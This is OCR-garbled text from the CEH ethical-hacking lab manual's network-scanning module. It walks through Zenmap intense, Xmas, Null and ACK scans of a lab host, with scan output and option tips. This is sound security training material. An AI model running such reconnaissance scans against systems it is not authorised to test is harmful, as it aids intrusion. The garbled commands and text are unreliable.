D is c o v e r e d o pe n p o r t 4 9 1 5 6 / t c p o n 1 0 . 0 . 6 . 4 D is c o v e r e d o pe n p o r t 4 9 1 5 5 / t c p o n 1 0 . 0 . 0 . 4 D is c o v e r e d o pe n p o r t 5 3 5 7 / t c p on 1 0 . 6 . 0 . 4 Filter Hosts

(1 t o t a l t 1 5 :3 5 1 5 :3 5 ,

1 6 .0 .0 .4 1 0 .0 .0 .4 1 6 .0 .0 .4 d ee t o 72

FIG U R E6 .5 :TheZ enm apm ainw indoww iththeN m apO utputtabforIntenseS can 9. After the scan is c o m p le t e , Nmap shows die scanned results.
C E H Lab M anual Page 125 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap
Scan Target: C om m and: nm a p -T4 -A - v 10.C.0.4 I o o ls £ ro file Help

T= I
Scan! Cancel

The options available to control target selection: ■ -iL<inputfilenam e> ■ -1R<numhosts> ■ -exclude <host1 >[,<host2>[,...]] ■ -excludefile <exclude file>
a

N m ap O utp ut | Ports / Hosts | T o p o lo g ) OS < Host ‫׳׳‬ 10.0.0.4 n m ap •T4 •A ■v 10.0.0.4 1 3 9 /tc p open

JH ost Details | Scans ‫פ כ‬

‫י‬

Details

445/tcp

open

5 3 5 7 /tc p open (SSOP/UPnP)

n e t b io s - s s n n c t b io s s sn h ttp M i c r o s o f t HTTPAPI h t t p d 2 .0

|_http‫־‬m«thods: No Allow or Public h«ad«r in OPTIONS
re s p o n s e ( s t a tu s code 5 03 ) | _ r r t t p - t i t l e : S e r v ic e U n a v a ila b le M i c r o s o f t W indow s RPC 4 9 1 5 2 / t c p o pe n m srp c M i c r o s o f t W indow s RPC 4 9 1 5 3 / t c p open m srp c M i c r o s o f t W indow s RPC 4 9 1 5 4 / t c p o pe n m srp c M i c r o s o f t W indow s RPC 4 9 1 5 5 / t c p open m srp c M i c r o s o f t W indow s RPC 4 9 1 5 6 / t c p open m srp c ______________ ;0 7 :1 0 ( M ic r o s o f t ) MAC Address: 0 ( 1 5 : 5D: D e v ic e t y p e : g e n e r a l p u rp o s e R u n n in g : M i c r o s o f t WindONS 7 | 2008 OS CPE: c p « : / o : ‫׳‬n ic r o s o f t : w in d o w s _ 7 c p e : / o : » ic r o s o f t : w i n d o w s _ s e r v e r _ 2 0 0 8 : : s p l 0 ‫ ל‬d e t a i l s : M i c r o s o f t W indow s 7 o r W indow s S e r v e r 2 00 8 SP1 U p tim e g u e s s : 0 .2 5 6 d a y s ( s i n c e F r i Aug ?4 0 9 : 2 7 : 4 0 2 0 1 2 ) N ttw o rK D is t a n c e ; 1 hop TCP S c u u c tic e P r e d i c t i o n : D i f f i c u l t y - 2 6 3 (O o od l u c k ! ) I P I P S e q u e n ce G e n e r a tio n : I n c r e m e n t a l S e r v ic e I n f o : OS: W in d o w s; CPE: c p e : / o : n ic r o s c f t : w in d o w s

‫ח‬

Q The follow ing options control host discovery: ■ -sL(list S can) ■ -sn(N oport scan) ■ -Pn (N oping) ■■ P S<port list> (T C P SY NP ing) ■ -PA<port list> (T C P A CKPing) ■ -PU<port list> (U D P Ping) ■ -PY<port list>(SC T P IN T TPing) ■ -PE;-PP;-PM(IC M P PingT ypes) ■ -PO<protocol list> (IP Protocol Ping) ■ -PR(A R PPing) ■— traceroute (T racepath tohost) ■ -n(N oD N Sresolution) ■ -R(D N Sresolutionfor all targets) ■ -system -dns (U se systemD N S resolver) ■ -dns-servers <server1 >[,<server2>[,. ..]] (Servers touse for reverse D N Squeries)

Filter Hosts

FIG U R E6 .6 :T heZ enm apm ainw indoww iththeN m apO utputtabforIntenseS can 10. Click the results.
P o r ts / H o s ts

tab to display more information on the scan
P o rt, P r o to c o l, S t a t e . S e r v ic e ,

11. Nmap also displays die the scan.
Scan Target: I o o ls P ro file H elp

and

V e r s io n

of

Z e n m a p
10.0.0.4 nm a p -T4 -A - v 10.0.0.4 Services OS ‫״״‬

T ‫ ־‬T

Scan

Cancel

C om m and:

Nm gp Out p

u

(

Tu[ . ul ut j y

Hu^t Details

Sk m :.

< Host
10.0.0.4 13S 139 445 5337 Up tcp tcp tcp open open open open open open open open open rm tp c n etbios-ssn n etbios-ssn h ttp m srpc m srpc m srpc m srpc m srpc M ic ro s o ft HTTPAPI h ttp d 2.0 (SSD M ic ro s o ft W indow s RPC M ic ro s o ft W ind ow s RPC M ic ro s o ft W ind ow s RPC M ic ro s o ft W ind ow s RPC M ic ro s o ft W ind ow s RPC M in o a o ft W ind ow s RPC

49152 tcp 49153 tcp 49154 tcp 49155 tcp 49156 tcp

FIG U R E6 .7 :TheZ enm apm ainw indoww iththePorts/H oststabforIntenseS can

C E H Lab M anual Page 126

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

12. Click the T o p o lo g y tab to view Nmap’s topology for the provided IP address in the In t e n s e s c a n Profile.

7^t B ydefault, N m ap perform s ahost discovery andthenaport scan against eachhost it determ inesto be online.

FIG U R E6 .8 :TheZ enm apm ainw indoww ithT opologytabfor IntenseS can 13. Click the H o s t D e t a ils tab to see die details of all hosts discovered during the intense scan profile.
Z e n m a p
Scan Target: lo o ls P rofile Help Scan Conccl 10.0.0.4 nm a p -T4 -A - v 10.0.0.4

r^ r°r* 1

C om m and:

Hosts OS < Host

||

Services

I

I N m ap O utp ut I Porte / H o c tt | T o po lo g yf * Hn^t O.O.C.4

Scan?

7^ ‫ ׳‬B ydefault, N m ap determ inesyour D N S servers (for rD N S resolution) fromyour resolv.conffile(U N IX ) or the R egistry(W in32).

-‫־׳‬

10.0.0.4

H Host Status
State: O pen p o rtc Filtered ports: Closed ports: Scanned ports: U p tim e : Last b oo t: up Q 0 991 1000 22151 Fri A u g 24 09:27:40 2012

#

B Addresses
IPv4: IPv6: M AC: 10.0.0.4 N o t available 00:15:50:00:07:10

- Operating System
Nam e: Accuracy: M ic ro s o ft W ind ow s 7 o r W indow s Server 2008 SP1

Ports used
Filter Hosts

FIG U R E6 .9 :TheZ enm apm ainw indoww ithH ostD etailstabforIntenseS can

C E H Lab M anual Page 127

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

14. Click the
Scan Target: Tools

Scans

tab to scan details for provided IP addresses.
Zenm ap

1- 1 ° ‫ ׳‬x
Cancel

Profile

Help Profile: Intense scan

10.0.0.4 nm a p •T4 •A -v 100.0.4

a N m ap offers options for specifyingw hichports are scannedandw hether the scanorder is random !2edor sequential.

C om m and:

Hosts OS

\\

Services

|

N m ap O u tp u t J P crts.' Hosts | T o po lo gy | H ost D e ta il;| S:an;

< Host
1 0 0 .0 4

Status

Com‫׳‬r»ard

Unsaved nmap -T4-A •v 10.00.4

i f ■ A pp e nd Scan

»

Remove Scan

Cancel Scan

a InN m ap, option-p <port ranges> m eans scan onlyspecifiedports.

FIG U R E6 .1 0 :TheZ enm apm ainw indoww ithS cantabforIntenseS can 15. Now, click the S e r v i c e s tab located in the right pane of the window. This tab displays the li s t of services. 16. Click the h ttp service to list all the HTTP Hostnames/lP Ports, and their s t a t e s (Open/Closed).
Z e n m a p
Scan Target: Tools Profile Help v] Profile: Intense scan v| Scan | Cancel 10.0.0.4 nm ap •T4 -A -v 10.0.0.4

ad d re sse s.

‫ י ־ז‬° ‫ד * מ‬

Comman d:

‫ו‬
Ports / Hosts Topology | H o c tD rtJ iik | S ^ jn t

Hosts Service

|

Services

N m ap O utput

< Hostname A Port < Protocol « State « Version

i

10.0.04

5357

tcp

open

M icroso ft HTTPAPI hctpd 2.0 (SSI

msrpc n etb io s5 5 ‫־‬n

Q InN m ap, option-F m eans fast (lim itedport) scan.

<L

FIG U R E6 .1 1 :TheZ enm apm ainw indoww ithS erv icesoptionforIntenseS can
C E H Lab M anual Page 128 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

17. Click the
Scan Target: I o o ls

m srp c

service to list all the Microsoft Windows RPC.
Z e n m a p ‫ ־ ז‬1‫ י ם‬x ‫׳‬
Scan]

P ro file

H elp ‫י‬ Profile: Intense scan

10.0.0.4 nm a p -T4 -A - v 10.0.0.4 Services

InN m ap, O ption— port-ratio cratioxdedmal num ber betw een0and 1 > m eans S cans all ports in nm ap-services filew itha ratiogreater thanthe one given. <ratio> m ust be betw een0.0and 1 .1

C om m and:

Nm ap O utput

Ports / Hosts

T o po lo gy | Host Details ^Scans

Service h ttp • • netbios-ssn • • • •

4 H o stnam e *‫ ־‬Port < P rotocol * State « Version 100.0.4 100.0.4 100.0.4 100 .04 1 0 0 .0 4 100.0.4 49156 49155 49154 49153 49152 135 Up tcp tcp tcp tcp tcp open open open open open open M icro so ft W in d o ro RPC M ic ro s o ft W indow s RPC M ic ro s o ft W indow s RPC M ic ro s o ft W indow s RPC M ic ro s o ft W indow s RPC M ic ro s o ft W indow s RPC

FIG U R E6.12T heZ enm apm ainw indow w ithm srpcS erv iceforIntenseS can 18. Click the
Scan Target: I c o ls

n e t b io s - s s n

service to list all NetBIOS hostnames.
Z e n m a p

T T T
Scan Cancel

E ro file

H e lp

10.0.0.4 nm a p -T4 -A - v 10.0.0.4 || Services |

C om m and: Hosts Service h ttp msrpc

InN m ap, O ption -r m eans don't random i2e ports.
hid

Nm ap O utput

Ports

f Hosts

T o po lo gy

Host D e oils

Scans

1 0 0 .0 J
100.0.4

445 139

tcp tcp

open open

FIG U R E6 .1 3 :TheZ enm apm ainw indoww ithnetbios-ssnS erv iceforIntenseS can
TASK 2
X m as Scan

19.

X m as scan

sends a T C P fra m e to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans only with OS TCP/IP developed
E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

C E H Lab M anual Page 129

M o d u le 0 3 - S c a n n in g N e tw o rk s

according to RFC 793. The current version of Microsoft Windows is not supported. 20. Now, to perform a Xmas Scan, you need to create a new profile. Click
P ro file ‫ >־‬N e w P r o file o r C o m m a n d C trl+ P

y ‫׳‬X m as scan(-sX ) sets the FIN , PSH , andU R G flags, lightingthe packet up likeaC hristm as tree.

m The option— m axretries <num tries> specifies the m axim um num ber ofport scanprobe retransm issions.

21. On the

P r o file

tab, enter

Xm as Scan

in the

P r o file n a m e

text field.

P ro file E d ito r
nm ap -T4 -A -v 10.0.0.4 Help Description P ro file In fo rm a tio n Profile name D * « n ip t 10n XmasScanj The description is a fu ll description 0♦ v»hac the scan does, w h ich m ay be long.

Profile

Scan | Ping | Scripting | Target | Source[ O thct | Tim ing

m The option-hosttim eout <tim e>givesup on slowtarget hosts.

Caned

0

Save Cl

a1 yci

FIG U R E6 .1 5 :T heZ enm apP rofileE ditorw indoww iththeP rofiletab

C E H Lab M anual Page 130

E th ic a l H ackin g and Counterm easures Copyright © by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

22. Click the S c a n tab, and select s c a n s : drop-down list. UDPscanis activated w iththe -sUoption. It can be com binedw ithaTC P scantype suchas SY Nscan (‫־‬sS ) to checkboth protocols duringthe sam e run.
!m a p -T4 -A -v 10.0.0.4

X m a s T r e e s c a n (‫־‬s X )

from the
1_T□ ' x

TCP

P ro file E d ito r

Profile

Scan | Ping | Scripting | Target) Source | O ther

Tim ing

Help
Enable all arf/anced/aggressive o ptio ns Enable OS detection (-0 ). version dete ction (-5V), script scanning (s and traceroute (‫־־‬traceroute).

S u n optk>m
Target? (optional): TCP scan: Non-TCP scans: T im in g tem plate: 10.00.4 None None ACK scan (-sA) ‫ ׳‬FIN scan (s F ) M aim on scan (-sM ) □ ‫ח‬ □ □ ‫ם‬ Version detection (-sV) Idle Scan (Zom bie) (-si) FTP bounce atta ck ( ‫־‬b) Disable reverse DNS resc IPv6 support (■6) N ull scan (-sN) TCP SYN scan (-5S) TCP co nn ect >can (‫»־‬T) . W ind ow scan )‫ ־‬sW ( | Xmas Tree scan (‫־‬sX)

FI

C M

Q N m ap detects rate lim itingand slow s dow n accordinglyto avoid floodingthe netw orkw ith useless packets that the target m achinedrops.

Cancel

0

Save Changes

FIG U R E6 .1 6 :TheZ enm apP rofileE ditorw indoww iththeS cantab 23. Select N o n e in die N o n -T C P s c a n s : drop-down list and T 4 ) in the T im in g t e m p la t e : list and click S a v e C h a n g e s
P ro file F riito r
nm ap •sX •T4 ■A ■v 10.0.0.4

A g g r e s s iv e (‫־‬

1 ‫י ^ ם|־‬

Profile

Scar

Ping | Scripting [ Target

Source | O ther | Tim ing

Help
Enable all ad/anced/aggressive o ptio ns Enable OS detection (-0 ). version d ete ction (-5V), script scanning (‫־‬ s Q and tra c e ro u te (—traceroute).

Scan o p tio n * Target? (optional): TCP scan: Non-TCP scans: T im in g tem plate:
@

Q Y oucanspeedup your U D Pscans by scanningm orehosts in parallel, doingaquickscan of just the popular ports first, scanningfrombehind the firew all, andusing‫־־‬ host-tim eout to skipslow hosts.

1D.0D.4 Xmas Tle e scan (-sX) None Aggressive (-T4) |v | [v‫] ׳‬ [v |

Enab le all a d va n ced / ag g ressve options (-A)

□ O □ □ O ‫ח‬

O perating system detection (-0) Version detection (-sV) Idle Scan (Zom bie) ( - 51) FTP bounce atta ck ( ‫־‬b) Disable reverse DNS resolution (‫־‬n) IPv6 support (-6)

Cancel

0

Save Changes

FIG U R E6 .1 7 :T heZ enm apP rofileE ditorw indoww iththeS cantab 24. Enter the IP address in die T a r g e t : field, select the from the P r o file : field and click S c a n .
X m as sca n

opdon

C E H Lab M anual Page 131

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap
Scan Target: Tools Profile Help |v | Profile- | Xmas Scan |v | |S can | Cancel |

10.0.0.4 nm ap -sX -T 4 - A -v 1 0 0 .0 /

C om m and:

(

Hosts

||

Services A

|

N m ap O u tp u t

P o rts /H o s ts | T o po lo gy

H ost Details

j Scans
V 1

InN m ap, option -sY (SCTPINITscan) is often referredto as half-open scanning, becauseyoudonf t openafull SC T P association. Y ousendan INITchunk, asifyouw ere goingto open areal associationandthenw ait for aresponse.

0 5 < H ost

| Details]

Filter Hosts

FIG U R E6 .1 8 :T heZ enm apm ainw indoww ithT arget andP rofileentered 25. Nmap scans the target IP address provided and displays results on the N m a p O u tp u t tab. £Q! W hen scanning system s, com pliant w ith this R FCtext, anypacket not containingSY N ,R S T , or A CKbits resultsin a returnedR ST , if theport is closed, andnoresponse at all, iftheport is open.
Zenm ap
Scan T a rg e t Tools P ro file H elp v l Profile. Xmas Scan |Scani|

izc

10.0.0.4 nm ap -sX -T 4 -A -v 1 0 0 .0 / Services

C om m and: Hosts OS « Host * 10.0.0.4

N ‫׳‬n a p O u tp u t

Ports / Hosts | T o po lo gy

H ost Details | Scans

nm a p -sX -T4 -A -v 10.0.0.4

S t a r t i n g Nmap 6 .0 1

( h ttp ://n m a p .o r g

) a t 2 0 1 2 - 0 8 -2 4

a The option, -sA(T C P A CKscan) is usedtom ap out firew all rulesets, determ iningw hether they are stateful or not and w hichports are filtered.

N<F‫ ל‬lo a d e d 93 s c r ip t s f o r s c a n n in g . NSE: S c r i p t P r e - s c a n n in g . I n i t i a t i n g ARP P in g S can a t 1 6 :2 9 S c a n n in g 1 0 . 0 . 0 . 4 [ 1 p o r t ] C o m p le te d ARP P in g Scan a t 1 6 : 2 9 , 0 .1 5 s e la p s e d ( 1 t o t a l h o s ts ) I n i t i a t i n g P a r a l l e l DMS r e s o l u t i o n o f 1 h o s t , a t 1 6 :2 9 c o m p le te d P a r a l l e l d n s r e s o l u t i o n o f l n o s t . a t 1 6 : 2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS S can a t 1 6 :2 9 S c a n r in g 1 0 . 0 . 6 . 4 [1 0 9 0 p o r t s ] I n c r e a s in g se nd d e la y f o r 1 0 . 0 . 0 . 4 f r o m 0 t o 5 due t o 34 o u t o f 84 d ro p p e d p ro & e s s in c e l a s t in c r e a s e . C o m p le te d XMAS S can a t 1 6 : 3 0 , 8 .3 6 s e la p s e d :1 0 0 0 t o t a l p o r ts )

Initiating Scrvice scon ot 16:30
I n i t i a t i n g OS d e t e c t i o n ( t r y # 1 ) a g a i r s t 1 0 . 0 . 0 . 4 NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 . I n i t i a t i n g MSE a t 1 6 :3 0 C o m p le te d NSE a t 1 6 : 3 0 , 0 .0 0 s e la p s e d Nnap s c o n r e p o r t f o r 1 0 . 0 . 0 . 4 H o s t i s u p ( 0 .e 0 0 2 0 s l a t e n c y ) .

FIG U R E6 .1 9 :T heZ enm apm ainw indow w iththeN m apO utputtab 26. Click the S e r v i c e s tab located at the right side of die pane. It all die services of that host.
d is p la y s

C E H Lab M anual Page 132

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap
Scan
Target:

‫־‬0
‫| 'י‬ | Scan |

= 1

I o o ls

P ro file

H elp ^ P ro file Xmas Scan

10.0.0.4 nm ap -sX -T 4 -A -v 10.0.0.4

C om m and:

Hosts

|

Services

|

N m ap O u tp u t

Ports / Hosts | T o p o lo g y | H o st Details | Scans Details

nm a p -sX T4 -A -v 10.0.0.4

S t a r t i n g Nmap 6 .0 1

( h ttp ://n m a p .o rg

) a t 2 0 1 2 * 0 8 -2 4

: L oa de d 0 3 * c r i p t c f o r s c a n n in g . NSE: S c r i p t P r e - s c a n n in g . I n i t i a t i n g ARP P l r g S can a t 1 6 :2 9 S c a n r in g 1 0 . 0 . 0 . 4 [ 1 p o r t ] C o m p le te d ARP P in g S can a t 1 6 : 2 9 , 8 .1 5 s e la p s e d ( 1 t o t a l h o s ts ) I n i t i a t i n g 3a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a t 1 6 :2 9 C o m p le te d P a r a l l e l DNS r e s o l u t i o n 0-f l n e s t , a t 1 6 : 2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS S can a t 1 6 :2 9 S c a n r in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ] I n c r e a s in g se nd d e la y f o r 1 0 . 0 . 0 . 4 f r o m e t o 5 due t o 34 o u t o f 84 d -o p p e d p ro o e s s in c e l a s t in c r e a s e . C o m p le te d XMAS S can a t 1 6 : 3 0 . 8 .3 6 s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i a t i n g S e r v ic e s c a n a t 1 6 :3 0 I n i t i a t i n g OS d e t e c t i o n ( t r y # 1 ) a g a in s t 1 0 . 0 . 0 . 4 NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 . I n i t i a t i n g USE a t 1 6 :3 0 C o m p le te d NSE a t 1 6 : 3 0 , 0 .0 0 s e la p s e d

‫ח‬
m

Nnap scan report for 10.0.0.4
H ost is u p ( 0 .0 0 0 2 0 s l a t e n c y ) . V

FIG U R E6 .2 0 :Z enm apM ainw indoww ithS erv icesT ab
S

T A S K

3

27.

Null S c a n

N u ll s c a n works only if the operating system’s TCP/IP implementation is developed according to RFC 793.111 a 1 1 1 1 1 1 scan, attackers send a TCP frame to a remote host with NO Flags.

The optionN ull Scan (-sN ) does not set anybits (T C Pflagheaderis 0).

28. To perform a 1 1 1 1 1 1 scan for a target IP address, create a new profile. Click P r o file ‫ >־‬N e w P ro file o r C o m m a n d C trl+ P
Z e n m a p
[ New Prof Je or Command 9 £d it Selected Prof <e C trk P | nas Scan Q rl+E v Scan | Cancel |

|

Hosts

||

Scrvncct

Nmap Output P ortj / Hosts | T opology] Ho»t D e t a S c e n t

OS « Host w 10.0.0.4

m The option, -sZ (SC T PCOOKIEECH O scan) isanadvanceSC T P COOKIEECHOscan. It takes advantageof the fact that SC T Pim plem entations shouldsilentlydroppackets containingCOO K IE ECHOchunks onopen ports but sendanA B O R T if the port is closed.

FIG U R E6 .2 1 :TheZ enm apm ainw indoww iththeN ewP rofileorC om m andoption

C E H Lab M anual Page 133

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

29. On die P r o file tab, input a profile name text field.
P ro file E d ito r

N u ll S c a n

in the

P r o file n a m e

L ^ I

a The option, -si <zom bie host>[:<probeport>] (idle scan) is anadvanced scan m ethodthat allow s for a trulyblindTC Pport scan of the target (m eaningno packets are sent tothe target fromyour real IP address). Instead, aunique side-channel attackexploits predictableIP fragm entationIDsequence generationonthe zom bie host togleaninform ation about the openports on thetarget.

nm ap -sX -T4 -A -v 10.0.0.4 Help Profile name P ro file In fo rm a tio n Profile name Description | N u ll Scanj~~| This is h o w the profile v/ill be id e n tf ied in the d ro p-d o w n co m b o box in th e scan tab.

Profile

Scan | Ping | Scripting | Target | Source | O ther | Tim ing^

FIG U R E622: TheZ enm apP rofileE ditorw iththeP rofiletab 30. Click die
m The option, -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it. Scan S c a n (‫־‬sN )

tab in the P r o file E d it o r window. Now select the option from the T C P s c a n : drop-down list.
P ro file E d ito r

N ull

n m a p -6X -T4 -A -v 10.0.0.4

P ro file] Scan | p!ng | S cnp tm g j larget | Source Scan o ptio ns Targets (optional): TCP scan: Non-TCP scans: T im in g tem plate: 1C.0.0.4

Jth e r

Tim ing

Help
P rof le name This is how the profile w ill be id entified n th e d ro p-d o w n co m b o box n th e scan tab.

Xmas Tree scan (-sX) None ACK seen ( sA)

|v

[Vj Enable all advanced/aggressu F N scan (‫ ־‬sF) □ □ O perating system detection (‫ ־‬M aim on t « n (•?M) Version dete ction (■sV) N u ll scan (•sN) TCP SYN scan(-sS) TCP conn ect scan (‫־‬sT)

(71 Idle Scan (Zom bie) (•si) O FTP bounce attack (-b)

(71 Disable reverse D N S resolutior W in cow scan (‫ ־‬sW)

The option, -r (D on't random izeports): B y default, N m ap random izes the scannedport order (except that certain com m onlyaccessibleports arem ovednear the beginning for efficiency reasons). T his random izationis norm ally desirable, but youcan specify-r for sequential (sortedfromlow est to highest) port scanning instead.

1 1 IPy 6 support (-6)

Xmas Tree !can (-sX)

Cancel

Save Changes

FIG U R E6 .2 3 :TheZ enm apP rofileE ditorw iththeS cantab 31. Select
N one A g g r e s s iv e (-T 4 )

from the N o n -T C P from the T im in g

scan s:

t e m p la t e :

drop-down field and select drop-down field.

32. Click S a v e

Changes

to save the newly created profile.

C E H Lab M anual Page 134

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P ro file E d ito r
n m a p -sN -sX -74 -A -v 10.0.0.4

'-IT - '
|Scan[ Help Disable reverse DNS resolution

InN m ap, option— version-all (T ryeverysingle probe) is analias for -version-intensity9 , ensuringthat everysingle probeis attem ptedagainst eachport.

Profile

Scan

P in g | Scripting | Target | S o ir e e [ C th ci | Timing

Scan o ptio ns Targets (opbonal): TCP scan: Non-TCP scans: T im ing tem plate: 10.0.04 N u l scan (•sN) None Aggressive (-T4) V V V N e \er do reverse DNS. This can slash scanning times.

C

O perating system dete ction (-0 )

[ Z Version detection (-5V)
I Idle Scan (Z om b ie) (-si)

Q

FTP bounce attack (-b)

I ! Disable reverse D N S resolution (-n)

IPv6 support (-6)

£oncel

E r j Save Change*

The option,-‫־‬topports <n> scans the <n> highest-ratioports foundin the nm ap-services file. <n> m ust be 1or greater.
m

FIG U R E6 .2 4 :TheZ enm apP rofileE ditorw iththeS cantab 33. 1 1 1 the main window of Zenmap, enter die t a r g e t IP a d d r e s s to scan, select the N u ll S c a n profile from the P r o file drop-down list, and then click S c a n .
Z e n m a p
Scfln
T a rg et

I o o ls

E ro file

Help
P ro f 1 ‫•י‬:

| 10.0.0.4

N u ll Scan

C o m m a n d:

nm a p -sN •sX •T4 -A *v 10.00.4

Hosts

Services

N m ap O u tp jt

Ports / Hosts

T o po lo gy | H ost Detais ( Scans

Q The option-sR(R P C scan), m ethodw orksin conjunctionw iththe variousport scanm ethods ofN m ap. It takes all the TCP/UDPports found openandfloods themw ith SunR PCprogramN U LL com m ands inanattem pt to determ inew hether theyare R PCports, andif so, w hat programandversion num ber theyserveup.

O S < H o st

< P ort < P rcto ccl < State < Service < Version

*U

10.00.4

Filter Hosts

FIG U R E6 .2 5 :T heZ enm apm ainw indoww ithT arget andP rofileentered 34. Nmap scans the target IP address provided and displays results in O u tp u t tab.
N m ap

C E H Lab M anual Page 135

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Z e n m a p
Scan Target Tools P rofile Help v Profile: N u ll Scan 10.0.0.4 nm a p -s N -T 4 -A -v 10.C.0.4

B Q
Scan!

u
Cancel

C o m m a n d:

Hosts OS < H ost IM 10.00.4

Services

N m ap O utp ut | P o rts / Hosts ] T o po lo gy [ H o st Details | Scans nm a p -sN •T4 • A - v 10.0.04

‫פן‬
) at 2012 0 8 24

Details

S ta r t in g

Mmap 6 .0 1

( h t t p : / / n 1r a p . o r g

The option-versiontrace (T raceversion scan activity) causesN m ap to pnnt out extensive debugginginfo aboutw hat versionscanningis doing. It is a subset ofw hat you getw ith— packet-trace,

N S t: Loaded 93 s c r i p t s f o r s c a n n in g . NSE: S c r i p t P r e - s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 6 :4 7 S c a n n in g 1 0 . 6 . 0 . 4 [1 p o r t ] C o n p le te d ARP P in g S can a t 1 6 : 4 7 , 0 . 1 4 s e la p s e c ( 1 t o t a l h o s ts ) I n i t i a t i n g P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t . 2 t 1 5 :4 7 C o n p le t e d P a r a l l e l DNS r e s o l u t i o n o-F 1 h o s t , a t 1 6 : 4 7 , 0 .2 8 s e la p s e d i n i t i a t i n g n u l l sca n a t 1 6 :4 7 S c a n n in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ] I n c r e a s in g se n d d e la y f o r 1 0 . 0 . 0 . 4 -fro m 0 t o 5 d u e t o 68 o u t o f 169 d ro p p e d p ro b e s s in c e l a s t i n c r e a s e . C o n p le t e d NULL S can a t 1 6 : 4 7 , 7 .7 B s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i a t i n g S e r v ic e s c a n a t 1 6 :4 7 I n i t i a t i n g OS d e t e c t i o n ( t r y * l ) a g a in s t 1 0 . 0 . 0 . 4 NSE: S c r i p t s c a n n in g 1 0 . 0 . 0 . 4 . I n i t i a t i n g NSE a t 1 6 :4 7 C o n p le te d NSE a t 1 6 : 4 7 , 0 .0 0 s e la D s e c Nmap s c a n r e p o r t f o r 1 0 . 0 . 0 . 4 H o s t i s up ( 0 . 0 0 0 0 6 8 s l a t e n c y ) . Filter Hosts

‫ח‬

FIG U R E6 .2 6 :T heZ enm apm ainw indoww iththeX m apO utputtab 35. Click the
H o s t D e t a ils S ta tu s , A d d re ss e s . O pen P o rts,

tab to view the details of hosts, such as and C lo s e d P o r ts
Z e n m a p ‫׳‬-[nrx
Cancel

H ost

'

Scan Ta rg et

Tools

£ r o fle

Help Profile: N u ll Scan

10.0.0.4 nm ap -s N -T 4 •A -v 10.0.0.4

C o m m a n d:

Hosts OS « Host * 10.0.0.4

Sen/ices

N m a p O utp ut | P o r ts / Hosts | T o p o lo g y

H ost Details | Scans

-1 0 .0 .0 .4 !
B Host Status
State: O pen ports: ports: Closed ports: up 0 0 1000

ie

Scanned ports: 1000 Up tirr e : Last b oo t: N o t available N o t available

S Addresses
IPv4:
IPv6:

10.0.0.4
N o t a vailable

M AC:

00:15:5D:00:07:10

• C o m m e n ts

Filter Hosts

FIG U R E627: TheZ enm apm ainw indoww iththeH ostD etailstab
T A S K 4

A C K F la g S c a n

36. Attackers send an A C K probe packet with a random sequence number. No response means the port is filtered and an R S T response means die port is not filtered.
E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

C E H Lab M anual Page 136

M o d u le 0 3 - S c a n n in g N e tw o rk s

37. To perform an A C K F la g S c a n for a target IP address, create a new profile. Click P ro file ‫ >־‬N e w P r o file o r C o m m a n d C trl+ P .
Z e n m a p
m The script: — scriptupdatedboptionupdates the script database foundin scripts/script.db, w hichis usedbyN m apto determ ine the available default scripts and categories. It is necessaryto update the database onlyif youhaveaddedor rem ovedN SEscripts from thedefault scriptsdirectory orifyouhavechangedthe categories ofanyscript. T his optionisgenerally used byitself: nm ap ‫־־‬ script-updatedb.

!^□T 0 E

C om m and:

fj?l Edit Selected Profile !!m o p ■v» ■ n* ‫• **־‬v Services ]

Ctrl+E

H o s t* OS 4 Host
IM 10.0.0.4

N m ip O jtp u t

Porte / Ho«t«

T o p o lo g y | H o d Details

JSc an t

4 P o ‫׳‬t 4 P ro to co l 4 S t a tt 4 S e rv ice 4 Version

Filter Hosts

FIG U R E6 .2 8 :TheZ enm apm ainw indoww iththeN ewP rofileorC om m andoption 38. On the
P r o file

tab, input A C K

F la g S c a n

in the

P r o file n a m e

text field.

P ro file E d ito r
